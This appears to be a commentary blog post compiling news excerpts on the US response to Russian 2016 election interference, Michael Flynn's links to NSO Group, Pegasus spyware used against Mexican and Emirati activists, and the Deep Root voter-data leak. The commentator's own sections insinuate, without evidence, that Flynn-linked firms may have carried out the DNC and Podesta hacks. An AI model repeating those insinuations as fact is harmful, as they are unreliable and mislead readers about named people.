Before departing for an August vacation to Martha’s Vineyard, Obama instructed aides to pursue ways to deter Moscow and proceed along three main paths: Get a high-confidence assessment from U.S. intelligence agencies on Russia’s role and intent; shore up any vulnerabilities in state-run election systems; and seek bipartisan support from congressional leaders for a statement condemning Moscow and urging states to accept federal help.
The administration encountered obstacles at every turn.
Despite the intelligence the CIA had produced, other agencies were slower to endorse a conclusion that Putin was personally directing the operation and wanted to help Trump. “It was definitely compelling, but it was not definitive,” said one senior administration official. “We needed more.”
Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence.
Brennan moved swiftly to schedule private briefings with congressional leaders. But getting appointments with certain Republicans proved difficult, officials said, and it was not until after Labor Day that Brennan had reached all members of the “Gang of Eight” — the majority and minority leaders of both houses and the chairmen and ranking Democrats on the Senate and House intelligence committees.
Jeh Johnson, the homeland-security secretary, was responsible for finding out whether the government could quickly shore up the security of the nation’s archaic patchwork of voting systems. He floated the idea of designating state mechanisms “critical infrastructure,” a label that would have entitled states to receive priority in federal cybersecurity assistance, putting them on a par with U.S. defense contractors and financial networks.
On Aug. 15, Johnson arranged a conference call with dozens of state officials, hoping to enlist their support. He ran into a wall of resistance.
The reaction “ranged from neutral to negative,” Johnson said in congressional testimony Wednesday.
Brian Kemp, the Republican secretary of state of Georgia, used the call to denounce Johnson’s proposal as an assault on state rights. “I think it was a politically calculated move by the previous administration,” Kemp said in a recent interview, adding that he remains unconvinced that Russia waged a campaign to disrupt the 2016 race. “I don’t necessarily believe that,” he said.
Stung by the reaction, the White House turned to Congress for help, hoping that a bipartisan appeal to states would be more effective.
In early September, Johnson, Comey and Monaco arrived on Capitol Hill in a caravan of black SUVs for a meeting with 12 key members of Congress, including the leadership of both parties.
The meeting devolved into a partisan squabble.
“The Dems were, ‘Hey, we have to tell the public,’?” recalled one participant. But Republicans resisted, arguing that to warn the public that the election was under attack would further Russia’s aim of sapping confidence in the system.
Senate Majority Leader Mitch McConnell (R‑Ky.) went further, officials said, voicing skepticism that the underlying intelligence truly supported the White House’s claims. Through a spokeswoman, McConnell declined to comment, citing the secrecy of that meeting.
Key Democrats were stunned by the GOP response and exasperated that the White House seemed willing to let Republican opposition block any pre-election move.
On Sept. 22, two California Democrats — Sen. Dianne Feinstein and Rep. Adam B. Schiff — did what they couldn’t get the White House to do. They issued a statement making clear that they had learned from intelligence briefings that Russia was directing a campaign to undermine the election, but they stopped short of saying to what end.
A week later, McConnell and other congressional leaders issued a cautious statement that encouraged state election officials to ensure their networks were “secure from attack.” The release made no mention of Russia and emphasized that the lawmakers “would oppose any effort by the federal government” to encroach on the states’ authorities.
When U.S. spy agencies reached unanimous agreement in late September that the interference was a Russian operation directed by Putin, Obama directed spy chiefs to prepare a public statement summarizing the intelligence in broad strokes.
With Obama still determined to avoid any appearance of politics, the statement would not carry his signature.
On Oct. 7, the administration offered its first public comment on Russia’s “active measures,” in a three-paragraph statement issued by Johnson and Clapper. Comey had initially agreed to attach his name, as well, officials said, but changed his mind at the last minute, saying that it was too close to the election for the bureau to be involved.
“The U.S. intelligence community is confident that the Russian government directed the recent compromises of e‑mails from U.S. persons and institutions, including from U.S. political organizations,” the statement said. “We believe, based on the scope and sensitivity of these efforts, that only Russia’s senior-most officials could have authorized these activities.”
Early drafts accused Putin by name, but the reference was removed out of concern that it might endanger intelligence sources and methods.
The statement was issued around 3:30 p.m., timed for maximum media coverage. Instead, it was quickly drowned out. At 4 p.m., The Post published a story about crude commentsTrump had made about women that were captured on an “Access Hollywood” tape. Half an hour later, WikiLeaks published its first batch of emails stolen from Clinton campaign chairman John Podesta.
…
‘Ample time’ after election
The Situation Room is actually a complex of secure spaces in the basement level of the West Wing. A video feed from the main room courses through some National Security Council offices, allowing senior aides sitting at their desks to see — but not hear — when meetings are underway.
As the Russia-related sessions with Cabinet members began in August, the video feed was shut off. The last time that had happened on a sustained basis, officials said, was in the spring of 2011 during the run-up to the U.S. Special Operations raid on bin Laden’s compound in Pakistan.
The blacked-out screens were seen as an ominous sign among lower-level White House officials who were largely kept in the dark about the Russia deliberations even as they were tasked with generating options for retaliation against Moscow.
Much of that work was led by the Cyber Response Group, an NSC unit with representatives from the CIA, NSA, State Department and Pentagon.
The early options they discussed were ambitious. They looked at sectorwide economic sanctions and cyberattacks that would take Russian networks temporarily offline. One official informally suggested — though never formally proposed — moving a U.S. naval carrier group into the Baltic Sea as a symbol of resolve.
What those lower-level officials did not know was that the principals and their deputies had by late September all but ruled out any pre-election retaliation against Moscow. They feared that any action would be seen as political and that Putin, motivated by a seething resentment of Clinton, was prepared to go beyond fake news and email dumps.
The FBI had detected suspected Russian attempts to penetrate election systems in 21 states, and at least one senior White House official assumed that Moscow would try all 50, officials said. Some officials believed the attempts were meant to be detected to unnerve the Americans. The patchwork nature of the United States’ 3,000 or so voting jurisdictions would make it hard for Russia to swing the outcome, but Moscow could still sow chaos.
“We turned to other scenarios” the Russians might attempt, said Michael Daniel, who was cybersecurity coordinator at the White House, “such as disrupting the voter rolls, deleting every 10th voter [from registries] or flipping two digits in everybody’s address.”
The White House also worried that they had not yet seen the worst of Russia’s campaign. WikiLeaks and DCLeaks, a website set up in June 2016 by hackers believed to be Russian operatives, already had troves of emails. But U.S. officials feared that Russia had more explosive material or was willing to fabricate it.
“Our primary interest in August, September and October was to prevent them from doing the max they could do,” said a senior administration official. “We made the judgment that we had ample time after the election, regardless of outcome, for punitive measures.”
The assumption that Clinton would win contributed to the lack of urgency.
Instead, the administration issued a series of warnings.
Brennan delivered the first on Aug. 4 in a blunt phone call with Alexander Bortnikov, the director of the FSB, Russia’s powerful security service.
A month later, Obama confronted Putin directly during a meeting of world leaders in Hangzhou, China. Accompanied only by interpreters, Obama told Putin that “we knew what he was doing and [he] better stop or else,” according to a senior aide who subsequently spoke with Obama. Putin responded by demanding proof and accusing the United States of interfering in Russia’s internal affairs.
In a subsequent news conference, Obama alluded to the exchange and issued a veiled threat. “We’re moving into a new era here where a number of countries have significant capacities,” he said. “Frankly, we’ve got more capacity than anybody both offensively and defensively.”
There were at least two other warnings.
On Oct. 7, the day that the Clapper-Johnson statement was released, Rice summoned Russian Ambassador Sergey Kislyak Sergey Kislyak to the White House and handed him a message to relay to Putin.
Then, on Oct. 31, the administration delivered a final pre-election message via a secure channel to Moscow originally created to avert a nuclear exchange. The message noted that the United States had detected malicious activity, originating from servers in Russia, targeting U.S. election systems and warned that meddling would be regarded as unacceptable interference. Russia confirmed the next day that it had received the message but replied only after the election through the same channel, denying the accusation.
As Election Day approached, proponents of taking action against Russia made final, futile appeals to Obama’s top aides: McDonough, Rice and Haines. Because their offices were part of a suite of spaces in the West Wing, securing their support on any national security issue came to be known as “moving the suite.”
One of the last to try before the election was Kerry. Often perceived as reluctant to confront Russia, in part to preserve his attempts to negotiate a Syria peace deal, Kerry was at critical moments one of the leading hawks.
In October, Kerry’s top aides had produced an “action memo” that included a package of retaliatory measures including economic sanctions. Knowing the White House was not willing to act before the election, the plan called for the measures to be announced almost immediately after votes had been securely cast and counted.
Kerry signed the memo and urged the White House to convene a principals meeting to discuss the plan, officials said. “The response was basically, ‘Not now,’” one official said.
Election Day arrived without penalty for Moscow.
…
A U.S. cyber-weapon
The most difficult measure to evaluate is one that Obama alluded to in only the most oblique fashion when announcing the U.S. response.
“We will continue to take a variety of actions at a time and place of our choosing, some of which will not be publicized,” he said in a statement released by the White House.
He was referring, in part, to a cyber operation that was designed to be detected by Moscow but not cause significant damage, officials said. The operation, which entailed implanting computer code in sensitive computer systems that Russia was bound to find, served only as a reminder to Moscow of the United States’ cyber reach.
But Obama also signed the secret finding, officials said, authorizing a new covert program involving the NSA, CIA and U.S. Cyber Command.
Obama declined to comment for this article, but a spokesman issued a statement: “This situation was taken extremely seriously, as is evident by President Obama raising this issue directly with President Putin; 17 intelligence agencies issuing an extraordinary public statement; our homeland security officials working relentlessly to bolster the cyber defenses of voting infrastructure around the country; the President directing a comprehensive intelligence review, and ultimately issuing a robust response including shutting down two Russian compounds, sanctioning nine Russian entities and individuals, and ejecting 35 Russian diplomats from the country.”
The cyber operation is still in its early stages and involves deploying “implants” in Russian networks deemed “important to the adversary and that would cause them pain and discomfort if they were disrupted,” a former U.S. official said.
The implants were developed by the NSA and designed so that they could be triggered remotely as part of retaliatory cyber-strike in the face of Russian aggression, whether an attack on a power grid or interference in a future presidential race.
Officials familiar with the measures said that there was concern among some in the administration that the damage caused by the implants could be difficult to contain.
As a result, the administration requested a legal review, which concluded that the devices could be controlled well enough that their deployment would be considered “proportional” in varying scenarios of Russian provocation, a requirement under international law.
The operation was described as long-term, taking months to position the implants and requiring maintenance thereafter. Under the rules of covert action, Obama’s signature was all that was necessary to set the operation in motion.
U.S. intelligence agencies do not need further approval from Trump, and officials said that he would have to issue a countermanding order to stop it. The officials said that they have seen no indication that Trump has done so.
———-
4a. Well look at that: As investigators explore the more than three dozen companies and individuals that Michael Flynn worked for – as a consultant, adviser, board member, or speaker – while advising the Trump campaign last year. And two of those entities are raising some extra eyebrows. Flynn was an advisory board member of Luxembourg-based OSY Technologies and consulted for the US-based private equity firm Francisco Partners. What’s so questionable about these entities? Well, Francisco Partners owns NSO Group – a secretive Israel-based cyberweapons dealer that sells advanced hacking tools to governments around the world – and OSY Technologies is an NSO Group offshoot. Flynn joined OSY in May of last year Yep, Michael Flynn worked for both the owner of an advanced cyberweapons dealer and one of its offshoots throughout the 2016 campaign.
“The month before Flynn joined the advisory board of OSY Technologies, NSO Group opened up a new arm called WestBridge Technologies, Inc., in the D.C. region. (The company was originally registered in Delaware in 2014, but formed in Maryland in April 2016.) Led by NSO Group co-founder Lavie, WestBridge is vying for federal government contracts for NSO Group’s products. Hiring Flynn would provide NSO Group with a well-connected figure in Washington, to help get its foot in the door of the notoriously insular world of secret intelligence budgeting.”
Yep, not only was Flynn working for NSO Group’s OSY Technologies and its owners at Francisco Partners, but NSO Group was also initiating plans to get more US government contracts…something that would presumably be much likelier to happen if Donald Trump won the White House and brought Flynn into the government.
And note how NSO Group wasn’t the only cybersecurity firm Flynn was working for:
“ . . . .When you’re trying to build up your business, you need someone who has connections, someone who is seen as an authority and a legitimate presence,” Johnson said. Hiring someone with Flynn’s background in intelligence would “open up doors that they wouldn’t have had access to,” Johnson said.
Throughout 2016, Flynn worked for a number of cybersecurity firms personally and through his consulting firm, Flynn Intel Group. In addition to his advisory board seat at OSY Technologies, he sat on the board of Adobe Systems, a large software company with Pentagon contracts, and the boards of the cybersecurity companies GreenZone Systems and HALO Privacy. (Though Flynn described himself as an Adobe advisory board member in his financial disclosure paperwork, the group said in a statement that he provided only “periodic counsel to Adobe’s public sector team.”) . . .”
…
In terms of assessing the significance of these business relationships, on the one hand, cybersecurity is one of the areas where one should expect the former head of the US Defense Intelligence Agency to go into after leaving government. On the other hand, we have just been told about the most hack-intensive US campaign in history and all the hacking was done in favor of Donald Trump. It is difficult to shake the notion that one or more of these firms may have been involved in one of the high-profile hacks.
Due to the relative lack of sophistication required to carrying out a spear-phishing – the method behind both the DNC server hack and Podesta’s emails and, allegedly, the attempts to hack 39 state election systems a week before the election – it really is the case that almost anyone could have pulled these hacks off if they had adequate hacking skills and wanted to hide their tracks and make it look like ‘the Russians’ did it. And the NSO Group’s software specializes in create spear-phishing campaigns designed to trick people into clicking on the bad links using a variety of different tricks and insert spying malware in the victims’ systems:
While serving as a top campaign aide to Donald Trump, former national security adviser Michael Flynn made tens of thousands of dollars on the side advising a company that sold surveillance technology that repressive governments used to monitor activists and journalists.
Flynn, who resigned in February after mischaracterizing his conversations with the Russian ambassador to the U.S., has already come under scrutiny for taking money from foreign outfits. Federal investigators began probing Flynn’s lobbying effortson behalf of a Dutch company led by a businessman with ties to the Turkish government earlier this year. Flynn’s moonlighting wasn’t typical: Most people at the top level of major presidential campaigns do not simultaneously lobby for any entity, especially not foreign governments. It’s also unusual for former U.S. intelligence officials to work with foreign cybersecurity outfits.
Nor was Flynn’s work with foreign entities while he was advising Trump limited to his Ankara deal. He earned nearly $1.5 million last year as a consultant, adviser, board member, or speaker for more than three dozen companies and individuals, according to financial disclosure forms released earlier this year.
Two of those entities are directly linked to NSO Group, a secretive Israeli cyberweapons dealer founded by Omri Lavie and Shalev Hulio, who are rumoredto have served in Unit 8200, the Israeli equivalent of the National Security Agency.
Flynn received $40,280 last year as an advisory board member for OSY Technologies, an NSO Group offshoot based in Luxembourg, a favorite tax haven for major corporations. OSY Technologies is part of a corporate structure that runs from Israel, where NSO Group is located, through Luxembourg, the Cayman Islands, the British Virgin Islands, and the U.S.
Flynn also worked as a consultant last year for Francisco Partners, a U.S.-based private equity firm that owns NSO Group, but he did not disclose how much he was paid. At least two Francisco Partners executives have sat on OSY’s board.
Flynn’s financial disclosure forms do not specify the work he did for companies linked to NSO Group, and his lawyer did not respond to requests for comment. Former colleagues at Flynn’s consulting firm declined to discuss Flynn’s work with NSO Group. Executives at Francisco Partners who also sit on the OSY Technologies board did not respond to emails. Lavie, the NSO Group co-founder, told HuffPost he is “not interested in speaking to the press” and referred questions to a spokesman, who did not respond to queries.
Many government and military officials have moved through the revolving door between government agencies and private cybersecurity companies. The major players in the cybersecurity contracting world – SAIC, Booz Allen Hamilton, CACI Federal and KeyW Corporation – all have former top government officials in leadership roles or on their boards, or have former top executives working in government.
But it’s less common for former U.S. intelligence officials to work with foreign cybersecurity outfits. “There is a lot of opportunity in the U.S. to do this kind of work,” said Ben Johnson, a former NSA employee and the co-founder of Obsidian Security. “It’s a little bit unexpected going overseas, especially when you combine that with the fact that they’re doing things that might end up in hands of enemies of the U.S. government. It does seem questionable.”
What is clear is that during the time Flynn was working for NSO’s Luxembourg affiliate, one of the company’s main products — a spy software sold exclusively to governments and marketed as a tool for law enforcement officials to monitor suspected criminals and terrorists — was being used to surveil political dissidents, reporters, activists, and government officials. The software, called Pegasus, allowed users to remotely break into a target’s cellular phone if the target responded to a text message.
Last year, several people targeted by the spyware contacted Citizen Lab, a cybersecurity research team based out of the University of Toronto. With the help of experts at the computer security firm Lookout, Citizen Lab researchers were able to trace the spyware hidden in the texts back to NSO Group spyware. After Citizen Lab publicized its findings, Apple introduced patches to fix the vulnerability. It is not known how many activists in other countries were targeted and failed to report it to experts.
NSO Group toldForbes in a statement last year that it complies with strict export control laws and only sells to authorized government agencies. “The company does NOT operate any of its systems; it is strictly a technology company,” NSO Group told Forbes.
But once a sale is complete, foreign governments are free to do what they like with the technology.
“The government buys [the technology] and can use it however they want,” Bill Marczak, one of the Citizen Lab researchers, told HuffPost. “They’re basically digital arms merchants.”
The month before Flynn joined the advisory board of OSY Technologies, NSO Group opened up a new arm called WestBridge Technologies, Inc., in the D.C. region. (The company was originally registered in Delaware in 2014, but formed in Maryland in April 2016.) Led by NSO Group co-founder Lavie, WestBridge is vying for federal government contracts for NSO Group’s products. Hiring Flynn would provide NSO Group with a well-connected figure in Washington, to help get its foot in the door of the notoriously insular world of secret intelligence budgeting.
“When you’re trying to build up your business, you need someone who has connections, someone who is seen as an authority and a legitimate presence,” Johnson said. Hiring someone with Flynn’s background in intelligence would “open up doors that they wouldn’t have had access to,” Johnson said.
Throughout 2016, Flynn worked for a number of cybersecurity firms personally and through his consulting firm, Flynn Intel Group. In addition to his advisory board seat at OSY Technologies, he sat on the board of Adobe Systems, a large software company with Pentagon contracts, and the boards of the cybersecurity companies GreenZone Systems and HALO Privacy. (Though Flynn described himself as an Adobe advisory board member in his financial disclosure paperwork, the group said in a statement that he provided only “periodic counsel to Adobe’s public sector team.”)
Prominent human rights activists and political dissidents have reported being targeted by NSO’s technology. On August 10, 2016, Ahmed Mansoor, an internationally recognized Emirati human rights activist, received a text message prompting him to click a link to read “new secrets” about detainees abused in UAE prisons. He got a similar text the next day. But Mansoor, who had already been repeatedly targeted by hackers, knew better than to click the links. Instead, he forwarded the messages to Citizen Lab.
Citizen Lab soon determined that NSO Group’s malware exploited an undisclosed mobile phone vulnerability, known as a zero-day exploit, that enabled its customers – that is, foreign governments – to surveil a target’s phone after the target clicked the link included in the phishing text message. If Mansoor had clicked that link, his “phone would have become a digital spy in his pocket, capable of employing his phone camera and microphone to snoop on activity in the vicinity of the device, recording his WhatsApp and Viber calls, logging messages sent in mobile chat apps, and tracking his movements,” Citizen Lab wrote in a report.
Across the globe in Mexico, where Coca-Cola and PepsiCo were working to repeal a tax on sodas imposed in 2014, two activists and a government-employed scientist, all of whom supported the soda tax, received a series of suspicious text messages. The texts, which became increasingly aggressive and threatening, came as the scientist and the activists were preparing a public relations campaign in support of raising the soda tax and promoting awareness of the health risks linked to sugary beverages.
Dr. Simón Barquera, researcher at Mexico’s National Institute for Public Health, received a text on July 11, 2016, inviting him to click a link the sender said would lead him to a detailed investigation of his clinic. When Barquera didn’t follow through, the texts escalated. On the 12th, he got a text with a link to a purported court document, which the sender claimed mentioned Barquera by name. On the 13th, yet another text included a link that supposedly contained information about a funeral. The day after that, the sender wrote, “You are an asshole Simon, while you are working I’m fuc king your old lady here is a photo.” The final text Barquera received in August said that his daughter was in “grave condition” after an accident, and included a link that would supposedly tell him where she was being treated.
Alejandro Calvillo, director of the consumer rights nonprofit El Poder del Consumidor, received a text with a link claiming to be from a man who wanted to know if Calvillo could attend the man’s father’s funeral. Another text sent to Calvillo included a link that the sender said was a viral news story that mentioned him. The final target, Luis Encarnación, a coordinator for the obesity prevention group Coalicion ContraPESO, also received a text with a link claiming that he was named in a news article.
The targets quickly got in touch with Citizen Lab and forwarded their text messages to the researchers. In February 2017, Citizen Lab released a new report linking NSO Group’s technology to the phishing attempts targeting the pro-soda tax campaigners.
Citizen Lab researchers have also identified texts sent last summer to Mexican journalist Rafael Cabrera that they believe were an attempt to infect his phone with NSO Group’s Pegasus spyware. Cabrera, who now works for BuzzFeed Mexico, was targeted by hackers after he broke a story revealing a potential conflict of interest with the Mexican first family and a Chinese company.
Citizen Lab believes NSO Group may have also sold its mobile phone spying technology to many governments, including those of Kenya, Mozambique, Yemen, Qatar, Turkey, Saudi Arabia, Uzbekistan, Thailand, Morocco, Hungary, Nigeria and Bahrain.
Working with repressive regimes is standard practice in the cyberweapons industry. The Italian surveillance malware firm Hacking Team has worked with dozens of countries known to jail dissidents, according to emails uploaded to WikiLeaks. The FBI and the Drug Enforcement Agencywere among the company’s customers, according to the documents.
Despite recent scrutiny over Mansoor’s case, NSO Group’s value has exploded in recent years. Francisco Partners bought the cyberweapons dealer in 2014 for $120 million. It is now reportedly valued at over $1 billion. . . .
4b. Due to the relative lack of sophistication required to carrying out a spear-phishing – the method behind both the DNC server hack and Podesta’s emails and, allegedly, the attempts to hack 39 state election systems a week before the election – almost anyone could have pulled these hacks off if they had adequate hacking skills, hiding their tracks and making appear as though “the Russians” did it. The NSO Group’s software specializes in create spear-phishing campaigns designed to trick people into clicking on the bad links using a variety of different tricks and insert spying malware in the victims’ systems. Their spear-phishing methodology is sophisticated.
“. . . . Increasingly, governments have found that the only way to monitor mobile phones is by using private businesses like the NSO Group that exploit little-known vulnerabilities in smartphone software. The company has, at times, operated its businesses under different names. One of them, OSY Technologies, paid Michael T. Flynn, President Trump’s former national security adviser, more than $40,000to be an advisory board member from May 2016 until January, according to his public financial disclosures. . . .”
Note how even when a phone is known to be hacked by someone using the NSO Group malware after a successful spear-phishing attempt, there’s still no way to know which NSO Group client did it. Even NSO Group claims it can’t determine who did it:
“. . . .The Mexican government’s deployment of spyware has come under suspicion before, including hacking attempts on political opponents and activists fighting corporate interests in Mexico.
Still, there is no ironclad proof that the Mexican government is responsible. The Pegasus software does not leave behind the hacker’s individual fingerprints. Even the software maker, the NSO Group, says it cannot determine who, exactly, is behind specific hacking attempts.
But cyberexperts can verify when the software has been used on a target’s phone, leaving them with few doubts that the Mexican government, or some rogue actor within it, was involved.
‘This is pretty much as good as it gets,’ said Bill Marczak, another senior researcher at Citizen Lab, who confirmed the presence of NSO code on several phones belonging to Mexican journalists and activists.
Moreover, it is extremely unlikely that cybercriminals somehow got their hands on the software, the NSO Group says, because the technology can be used only by the government agency where it is installed. . . .”
Yet for the DNC/Podesta hacks, which were also spear-phishing campaigns but against targets with a wide variety of potential enemies across the globe, the primary evidence we’re given that the Russian government was really behind the hacks was the amazingly sloppy hacker ‘mistakes’ like Cyrillic characters in the hacked document meta-data and leaving the Bitly accounts they were using to create the links used in the spear-phishing emails public so Cyber-security researchers could watch their entire hacking campaign list of targets. In other words, ‘evidence’ that could have easily be left to be found.
All of this adds to the mystery of Michael Flynn and the potential role he played in the Trump campaign: The former head of the US military’s spy agency worked for a company that makes advanced software designed to first conduct a successful spear-phishing campaign and then gives the victim NSO Group’s special spying malware, the same kind of campaign that attacked the DNC, John Podesta, and the 39 state election systems.
Yet almost no one seems to raise the question as to whether or not Flynn and his deep ties to the hacking world could have had anything to do with those high-profile hacks. Only consideration of Russian hackers is allowed. It’s a pretty mysterious mystery, although perhaps not as mysterious as the investigation.
Mexico’s most prominent human rights lawyers, journalists and anti-corruption activists have been targeted by advanced spyware sold to the Mexican government on the condition that it be used only to investigate criminals and terrorists.
The targets include lawyers looking into the mass disappearance of 43 students, a highly respected academic who helped write anti-corruption legislation, two of Mexico’s most influential journalists and an American representing victims of sexual abuse by the police. The spying even swept up family members, including a teenage boy.
Since 2011, at least three Mexican federal agencies have purchased about $80 million worth of spyware created by an Israeli cyberarms manufacturer. The software, known as Pegasus, infiltrates smartphones to monitor every detail of a person’s cellular life — calls, texts, email, contacts and calendars. It can even use the microphone and camera on phones for surveillance, turning a target’s smartphone into a personal bug.
The company that makes the software, the NSO Group, says it sells the tool exclusively to governments, with an explicit agreement that it be used only to battle terrorists or the drug cartels and criminal groups that have long kidnapped and killed Mexicans.
But according to dozens of messages examined by The New York Times and independent forensic analysts, the software has been used against some of the government’s most outspoken critics and their families, in what many view as an unprecedented effort to thwart the fight against the corruption infecting every limb of Mexican society.
“We are the new enemies of the state,” said Juan E. Pardinas, the general director of the Mexican Institute for Competitiveness, who has pushed anti-corruption legislation. His iPhone, along with his wife’s, was targeted by the software, according to an independent analysis. “Ours is a society where democracy has been eroded,” he said.
The deployment of sophisticated cyberweaponry against citizens is a snapshot of the struggle for Mexico itself, raising profound legal and ethical questions for a government already facing severe criticismfor its human rights record. Under Mexican law, only a federal judge can authorize the surveillance of private communications, and only when officials can demonstrate a sound basis for the request.
It is highly unlikely that the government received judicial approval to hack the phones, according to several former Mexican intelligence officials. Instead, they said, illegal surveillance is standard practice.
“Mexican security agencies wouldn’t ask for a court order, because they know they wouldn’t get one,” said Eduardo Guerrero, a former analyst at the Center for Investigation and National Security, Mexico’s intelligence agency and one of the government agencies that use the Pegasus spyware. “I mean, how could a judge authorize surveillance of someone dedicated to the protection of human rights?”
“There, of course, is no basis for that intervention, but that is besides the point,” he added. “No one in Mexico ever asks for permission to do so.”
The hacking attempts were highly personalized, striking critics with messages designed to inspire fear — and get them to click on a link that would provide unfettered access to their cellphones.
Carmen Aristegui, one of Mexico’s most famous journalists, was targeted by a spyware operator posing as the United States Embassy in Mexico, instructing her to click on a link to resolve an issue with her visa. The wife of Mr. Pardinas, the anti-corruption activist, was targeted with a message claiming to offer proof that he was having an extramarital affair.
For others, imminent danger was the entry point, like a message warning that a truck filled with armed men was parked outside Mr. Pardinas’s home.
“I think that any company that sells a product like this to a government would be horrified by the targets, of course, which don’t seem to fall into the traditional role of criminality,” said John Scott-Railton, a senior researcher at Citizen Lab at the Munk School of Global Affairs at the University of Toronto, which examined the hacking attempts.
The Mexican government acknowledges gathering intelligence against legitimate suspects in accordance with the law. “As in any democratic government, to combat crime and threats against national security the Mexican government carries out intelligence operations,” it said in a statement.
But the government “categorically denies that any of its members engages in surveillance or communications operations against defenders of human rights, journalists, anti-corruption activists or any other person without prior judicial authorization.”
The Mexican government’s deployment of spyware has come under suspicion before, including hacking attempts on political opponents and activists fighting corporate interests in Mexico.
Still, there is no ironclad proof that the Mexican government is responsible. The Pegasus software does not leave behind the hacker’s individual fingerprints. Even the software maker, the NSO Group, says it cannot determine who, exactly, is behind specific hacking attempts.
But cyberexperts can verify when the software has been used on a target’s phone, leaving them with few doubts that the Mexican government, or some rogue actor within it, was involved.
“This is pretty much as good as it gets,” said Bill Marczak, another senior researcher at Citizen Lab, who confirmed the presence of NSO code on several phones belonging to Mexican journalists and activists.
Moreover, it is extremely unlikely that cybercriminals somehow got their hands on the software, the NSO Group says, because the technology can be used only by the government agency where it is installed.
The company is part of a growing number of digital spying businesses that operate in a loosely regulated space. The market has picked up in recent years, particularly as companies like Apple and Facebook start encrypting their customers’ communications, making it harder for government agencies to conduct surveillance.
Increasingly, governments have found that the only way to monitor mobile phones is by using private businesses like the NSO Group that exploit little-known vulnerabilities in smartphone software. The company has, at times, operated its businesses under different names. One of them, OSY Technologies, paid Michael T. Flynn, President Trump’s former national security adviser, more than $40,000 to be an advisory board member from May 2016 until January, according to his public financial disclosures.
Before selling to governments, the NSO Group says, it vets their human rights records. But once the company licenses the software and installs its hardware inside intelligence and law enforcement agencies, the company says, it has no way of knowing how its spy tools are used — or whom they are used against.
The company simply bills governments based on the total number of surveillance targets. To spy on 10 iPhone users, for example, the company charges $650,000 on top of a flat $500,000 installation fee, according to NSO marketing proposals reviewed by The New York Times.
Even when the NSO Group learns that its software has been abused, there is only so much it can do, the company says, arguing that it cannot simply march into intelligence agencies, remove its hardware and take back its spyware.
“When you’re selling AK-47s, you can’t control how they’ll be used once they leave the loading docks,” said Kevin Mahaffey, chief technology officer at Lookout, a mobile security company.
Rather, the NSO Group relies on its customers to cooperate in a review, then turns over the findings to the appropriate governmental authority — in effect, leaving governments to police themselves.
Typically, the company’s only recourse is to slowly cut off a government’s access to the spy tools over the course of months, or even years, by ceasing to provide new software patches, features and updates. But in the case of Mexico, the NSO Group has not condemned or even acknowledged any abuse, despite repeated evidence that its spy tools have been deployed against ordinary citizens and their families.
5. GOP-affiliated data analytics firm Deep Root has quite a data-privacy violation. A cybersecurity researcher discovered a Deep Root server with public access to their proprietary database of the voting habits/political views on over 198 million Americans on June 12th. Deep Root claims this was all due to an accident.
We wonder if there might be a link between the Deep Root data basing and other GOP cyber tactics and the alleged “Russian hacking” of U.S. election systems?
” . . . . To appeal to the three crucial categories, it appears that Trump’s team relied on voter data provided by Data Trust. Complete voter rolls for 2008 and 2012, as well as partial 2016 voter rolls for Florida and Ohio, apparently compiled by Data Trust are contained in the dataset exposed by Deep Root.
Data Trust acquires voter rolls from state officials and then standardizes the voter data to create a clean, manageable record of all registered US voters, a source familiar with the firm’s operations told Gizmodo. Voter data itself is public record and therefore not particularly sensitive, the source added, but the tools Data Trust uses to standardize that data are considered proprietary. That data is then provided to political clients, including analytics firms like Deep Root. While Data Trust requires its clients to protect the data, it has to take clients at their word that industry-standard encryption and security protocols are in place.
TargetPoint and Causeway, the two firms employed by the RNC in addition to Deep Root, apparently layered their own analytics atop the information provided by Data Trust. TargetPoint conducted thousands of surveys per week in 22 states, according to AdAge, gauging voter sentiment on a variety of topics. While Causeway helped manage the data, Deep Root used it to perfect its TV advertising targets—producing voter turnout estimates by county and using that intelligence to target its ad buys. . . .”
Political data gathered on more than 198 million US citizens was exposed this month after a marketing firm contracted by the Republican National Committee stored internal documents on a publicly accessible Amazon server.
The data leak contains a wealth of personal information on roughly 61 percent of the US population. Along with home addresses, birthdates, and phone numbers, the records include advanced sentiment analyses used by political groups to predict where individual voters fall on hot-button issues such as gun ownership, stem cell research, and the right to abortion, as well as suspected religious affiliation and ethnicity. The data was amassed from a variety of sources—from the banned subreddit r/fatpeoplehate to American Crossroads, the super PAC co-founded by former White House strategist Karl Rove.
Deep Root Analytics, a conservative data firm that identifies audiences for political ads, confirmed ownership of the data to Gizmodo on Friday.
UpGuard cyber risk analyst Chris Vickery discovered Deep Root’s data online last week. More than a terabyte was stored on the cloud server without the protection of a password and could be accessed by anyone who found the URL. Many of the files did not originate at Deep Root, but are instead the aggregate of outside data firms and Republican super PACs, shedding light onto the increasingly advanced data ecosystem that helped propel President Donald Trump’s slim margins in key swing states.
Although files possessed by Deep Root would be typical in any campaign, Republican or Democratic, experts say its exposure in a single open database raises significant privacy concerns. “This is valuable for people who have nefarious purposes,” Joseph Lorenzo Hall, the chief technologist at the Center for Democracy and Technology, said of the data.
The RNC paid Deep Root $983,000 last year, according to Federal Election Commission reports, but its server contained records from a variety of other conservative sources paid millions more, including The Data Trust (also known as GOP Data Trust), the Republican party’s primary voter file provider. Data Trust received over $6.7 million from the RNC during the 2016 cycle, according to OpenSecrets.org, and its president, Johnny DeStefano, now serves as Trump’s director of presidential personnel.
The Koch brothers’ political group Americans for Prosperity, which had a data-swapping agreement with Data Trust during the 2016 election cycle, contributed heavily to the exposed files, as did the market research firm TargetPoint, whose co-founder previously served as director of Mitt Romney’s strategy team. (The Koch brothers also subsidized a data company known as i360, which began exchanging voter files with Data Trust in 2014.) Furthermore, the files provided by Rove’s American Crossroads contain strategic voter data used to target, among others, disaffected Democrats and undecideds in Nevada, New Hampshire, Ohio, and other key battleground states.
Deep Root further obtained hundreds of files (at least) from The Kantar Group, a leading media and market research company with offices in New York, Beijing, Moscow, and more than a hundred other cities on six continents. Each file offers rich details about political ads—estimated cost, audience demographics, reach, and more—by and about figures and groups spanning the political spectrum. There are files on the Democratic Senatorial Campaign Committee, Planned Parenthood, and the American Civil Liberties Union, as well as files on every 2016 presidential candidate, Republicans included.
What’s more, the Kantar files each contain video links to related political ads stored on Kantar’s servers.
